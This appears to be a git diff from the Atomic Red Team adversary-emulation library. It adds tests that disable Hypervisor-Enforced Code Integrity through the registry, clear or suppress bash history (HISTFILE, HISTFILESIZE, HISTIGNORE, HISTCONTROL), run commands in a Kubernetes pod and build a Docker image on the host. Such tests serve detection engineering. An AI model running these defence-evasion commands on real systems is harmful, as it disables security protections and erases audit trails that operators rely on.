reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -861,3 +861,36 @@ atomic_tests:
|
||||
sync
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Disable Hypervisor-Enforced Code Integrity (HVCI)
|
||||
auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
|
||||
description: |
|
||||
This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
|
||||
The pre-req needs to be ran in order to setup HVCI and have it enabled.
|
||||
We do not recommend running this in production.
|
||||
[Black Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)
|
||||
[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
HVCI must be enabled
|
||||
prereq_command: |
|
||||
if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }
|
||||
get_prereq_command: |
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
executor:
|
||||
command: |
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
|
||||
cleanup_command: |
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
@@ -16,6 +16,16 @@ Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/te
|
||||
|
||||
- [Atomic Test #2 - Mac HISTCONTROL](#atomic-test-2---mac-histcontrol)
|
||||
|
||||
- [Atomic Test #3 - Clear bash history](#atomic-test-3---clear-bash-history)
|
||||
|
||||
- [Atomic Test #4 - Setting the HISTCONTROL environment variable](#atomic-test-4---setting-the-histcontrol-environment-variable)
|
||||
|
||||
- [Atomic Test #5 - Setting the HISTFILESIZE environment variable](#atomic-test-5---setting-the-histfilesize-environment-variable)
|
||||
|
||||
- [Atomic Test #6 - Setting the HISTFILE environment variable](#atomic-test-6---setting-the-histfile-environment-variable)
|
||||
|
||||
- [Atomic Test #7 - Setting the HISTIGNORE environment variable](#atomic-test-7---setting-the-histignore-environment-variable)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -80,4 +90,215 @@ https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcon
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Clear bash history
|
||||
An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities.
|
||||
|
||||
In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 878794f7-c511-4199-a950-8c28b3ed8e5b
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
cp $HISTFILE $HISTFILE.OLD
|
||||
if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
|
||||
echo "" > $HISTFILE
|
||||
if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
|
||||
ls -la $HISTFILE
|
||||
cat $HISTFILE
|
||||
history -c
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
mv -f $HISTFILE.OLD $HISTFILE
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Setting the HISTCONTROL environment variable
|
||||
An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used.
|
||||
|
||||
In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 10ab786a-028e-4465-96f6-9e83ca6c5f24
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
TEST=$(echo $HISTCONTROL)
|
||||
if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
|
||||
history -c
|
||||
ls -la $HISTFILE # " ls -la $HISTFILE"
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
|
||||
# -> ls -la is not in history cache
|
||||
if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
|
||||
history -c
|
||||
ls -la $HISTFILE
|
||||
ls -la $HISTFILE
|
||||
ls -la $HISTFILE
|
||||
if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
export HISTCONTROL=$(echo $TEST)
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Setting the HISTFILESIZE environment variable
|
||||
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
TEST=$(echo $HISTFILESIZE)
|
||||
echo $HISTFILESIZE
|
||||
export HISTFILESIZE=0
|
||||
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
|
||||
# -> $HISTFILESIZE is zero
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
export HISTCONTROL=$(echo $TEST)
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #6 - Setting the HISTFILE environment variable
|
||||
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
TEST=$(echo $HISTFILE)
|
||||
echo $HISTFILE
|
||||
export HISTFILE="/dev/null"
|
||||
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
|
||||
# -> $HISTFILE is /dev/null
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
export HISTFILE=$(echo $TEST)
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - Setting the HISTIGNORE environment variable
|
||||
An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands.
|
||||
|
||||
In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
|
||||
# -> $HISTIGNORE = ls*:rm*:ssh*
|
||||
history -c
|
||||
ls -la $HISTFILE
|
||||
ls -la ~/.bash_logout
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
|
||||
# -> ls commands are not in history
|
||||
unset HISTIGNORE
|
||||
|
||||
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
|
||||
# -> $HISTIGNORE = *
|
||||
history -c
|
||||
whoami
|
||||
groups
|
||||
if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
|
||||
# -> History cache is empty
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```bash
|
||||
unset HISTIGNORE
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -35,3 +35,119 @@ atomic_tests:
|
||||
3. ls
|
||||
4. whoami > recon.txt
|
||||
name: manual
|
||||
- name: Clear bash history
|
||||
auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
|
||||
description: |
|
||||
An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities.
|
||||
|
||||
In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo "" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
cp $HISTFILE $HISTFILE.OLD
|
||||
if ((${#HISTFILE[@]})); then echo $HISTFILE; fi
|
||||
echo "" > $HISTFILE
|
||||
if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo "$HISTFILE is larger than 1k"; fi
|
||||
ls -la $HISTFILE
|
||||
cat $HISTFILE
|
||||
history -c
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "History cache cleared"; fi
|
||||
cleanup_command: |
|
||||
mv -f $HISTFILE.OLD $HISTFILE
|
||||
- name: Setting the HISTCONTROL environment variable
|
||||
auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
|
||||
description: |
|
||||
An attacker may exploit the space before a command (e.g. " ls") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used.
|
||||
|
||||
In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms that their is only one command in history
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTCONTROL)
|
||||
if [ "$HISTCONTROL" != "ignoreboth" ]; then export HISTCONTROL="ignoreboth"; fi
|
||||
history -c
|
||||
ls -la $HISTFILE # " ls -la $HISTFILE"
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "ls -la is not in history cache"; fi
|
||||
# -> ls -la is not in history cache
|
||||
if [ "$HISTCONTROL" != "erasedups" ]; then export HISTCONTROL="erasedups"; fi
|
||||
history -c
|
||||
ls -la $HISTFILE
|
||||
ls -la $HISTFILE
|
||||
ls -la $HISTFILE
|
||||
if [ $(history |wc -l) -eq 2 ]; then echo "Their is only one entry for ls -la $HISTFILE"; fi
|
||||
cleanup_command: |
|
||||
export HISTCONTROL=$(echo $TEST)
|
||||
- name: Setting the HISTFILESIZE environment variable
|
||||
auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
|
||||
description: |
|
||||
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILESIZE)
|
||||
echo $HISTFILESIZE
|
||||
export HISTFILESIZE=0
|
||||
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
|
||||
# -> $HISTFILESIZE is zero
|
||||
cleanup_command: |
|
||||
export HISTCONTROL=$(echo $TEST)
|
||||
- name: Setting the HISTFILE environment variable
|
||||
auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
description: |
|
||||
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILE)
|
||||
echo $HISTFILE
|
||||
export HISTFILE="/dev/null"
|
||||
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
|
||||
# -> $HISTFILE is /dev/null
|
||||
cleanup_command: |
|
||||
export HISTFILE=$(echo $TEST)
|
||||
- name: Setting the HISTIGNORE environment variable
|
||||
auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
description: |
|
||||
An Adversary may take advantage of the HISTIGNORE environment variable either to ignore particular commands or all commands.
|
||||
|
||||
In this test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this history cache 3..4 execute ls commands 5. confirm that the ls commands are not in the history cache 6. unset HISTIGNORE variable 7.. same again, but ignoring ALL commands.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='ls*:rm*:ssh*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
|
||||
# -> $HISTIGNORE = ls*:rm*:ssh*
|
||||
history -c
|
||||
ls -la $HISTFILE
|
||||
ls -la ~/.bash_logout
|
||||
if [ $(history |wc -l) -eq 1 ]; then echo "ls commands are not in history"; fi
|
||||
# -> ls commands are not in history
|
||||
unset HISTIGNORE
|
||||
|
||||
if ((${#HISTIGNORE[@]})); then echo "\$HISTIGNORE = $HISTIGNORE"; else export HISTIGNORE='*'; echo "\$HISTIGNORE = $HISTIGNORE"; fi
|
||||
# -> $HISTIGNORE = *
|
||||
history -c
|
||||
whoami
|
||||
groups
|
||||
if [ $(history |wc -l) -eq 0 ]; then echo "History cache is empty"; fi
|
||||
# -> History cache is empty
|
||||
cleanup_command: |
|
||||
unset HISTIGNORE
|
||||
|
||||
@@ -30,13 +30,16 @@ Attackers who have permissions, can run malicious commands in containers in the
|
||||
|------|-------------|------|---------------|
|
||||
| namespace | K8s namespace to use | string | default|
|
||||
| command | Command to run | string | uname|
|
||||
| path | Path to busybox.yaml file | string | $PathtoAtomicsFolder/T1609/src/busybox.yaml|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
kubectl create -f src/busybox.yaml -n #{namespace}
|
||||
kubectl create -f #{path} -n #{namespace}
|
||||
# wait 3 seconds for the instance to come up
|
||||
sleep 3
|
||||
kubectl exec -n #{namespace} busybox -- #{command}
|
||||
```
|
||||
|
||||
|
||||
@@ -16,6 +16,10 @@ atomic_tests:
|
||||
description: Command to run
|
||||
type: string
|
||||
default: uname
|
||||
path:
|
||||
description: Path to busybox.yaml file
|
||||
type: string
|
||||
default: $PathtoAtomicsFolder/T1609/src/busybox.yaml
|
||||
dependencies:
|
||||
- description: |
|
||||
kubectl must be installed
|
||||
@@ -25,7 +29,9 @@ atomic_tests:
|
||||
which kubectl
|
||||
executor:
|
||||
command: |
|
||||
kubectl create -f src/busybox.yaml -n #{namespace}
|
||||
kubectl create -f #{path} -n #{namespace}
|
||||
# wait 3 seconds for the instance to come up
|
||||
sleep 3
|
||||
kubectl exec -n #{namespace} busybox -- #{command}
|
||||
cleanup_command: |
|
||||
kubectl delete pod busybox -n #{namespace}
|
||||
|
||||
@@ -5,10 +5,10 @@ metadata:
|
||||
spec:
|
||||
containers:
|
||||
- name: busybox
|
||||
image: busybox:stable
|
||||
imagePullPolicy: IfNotPresent
|
||||
image: busybox
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- while true; do sleep 30; done;
|
||||
restartPolicy: OnFailure
|
||||
restartPolicy: OnFailure
|
||||
|
||||
@@ -0,0 +1,67 @@
|
||||
# T1612 - Build Image on Host
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1612)
|
||||
<blockquote>Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
|
||||
|
||||
An adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. </blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Build Image On Host](#atomic-test-1---build-image-on-host)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Build Image On Host
|
||||
Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.
|
||||
|
||||
**Supported Platforms:** Containers
|
||||
|
||||
|
||||
**auto_generated_guid:** 2db30061-589d-409b-b125-7b473944f9b3
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
docker build -t t1612 $PathtoAtomicsFolder/T1612/src/
|
||||
docker run --name t1612_container -d -t t1612
|
||||
docker exec t1612_container ./test.sh
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
docker stop t1612_container
|
||||
docker rmi -f t1612
|
||||
```
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `sh`!
|
||||
##### Description: Verify docker is installed.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
which docker
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
```
|
||||
##### Description: Verify docker service is running.
|
||||
##### Check Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl status docker --no-pager
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```sh
|
||||
sudo systemctl start docker
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -0,0 +1,30 @@
|
||||
attack_technique: T1612
|
||||
display_name: "Build Image on Host"
|
||||
atomic_tests:
|
||||
- name: Build Image On Host
|
||||
auto_generated_guid: 2db30061-589d-409b-b125-7b473944f9b3
|
||||
description: Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize Deploy Container using that custom image.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: |
|
||||
which docker
|
||||
get_prereq_command: |
|
||||
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
|
||||
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: |
|
||||
sudo systemctl status docker --no-pager
|
||||
get_prereq_command: |
|
||||
sudo systemctl start docker
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1612 $PathtoAtomicsFolder/T1612/src/
|
||||
docker run --name t1612_container -d -t t1612
|
||||
docker exec t1612_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1612_container
|
||||
docker rmi -f t1612
|
||||
name: sh
|
||||
@@ -0,0 +1,9 @@
|
||||
FROM ubuntu:20.04
|
||||
WORKDIR /
|
||||
LABEL key="CyberSecurity_project"
|
||||
RUN echo "CyberSecurity_project"
|
||||
RUN apt update && apt install -y git
|
||||
COPY test.sh /test.sh
|
||||
RUN chmod +x /test.sh
|
||||
ENTRYPOINT ["tail", "-f", "/dev/null"]
|
||||
|
||||
@@ -0,0 +1,4 @@
|
||||
#!/usr/bin/bash
|
||||
|
||||
echo "You have been hacked"
|
||||
|
||||
@@ -1291,3 +1291,14 @@ c3a377f9-1203-4454-aa35-9d391d34768f
|
||||
fb4151a2-db33-4f8c-b7f8-78ea8790f961
|
||||
adae83d3-0df6-45e7-b2c3-575f91584577
|
||||
e3ad8e83-3089-49ff-817f-e52f8c948090
|
||||
2db30061-589d-409b-b125-7b473944f9b3
|
||||
878794f7-c511-4199-a950-8c28b3ed8e5b
|
||||
10ab786a-028e-4465-96f6-9e83ca6c5f24
|
||||
5cafd6c1-2f43-46eb-ac47-a5301ba0a618
|
||||
b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
70bd71e6-eba4-4e00-92f7-617911dbe020
|
||||
06eaafdb-8982-426e-8a31-d572da633caa
|
||||
007d7aa4-8c4d-4f55-ba6a-7c965d51219c
|
||||
0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
|
||||
Reference in New Issue
Block a user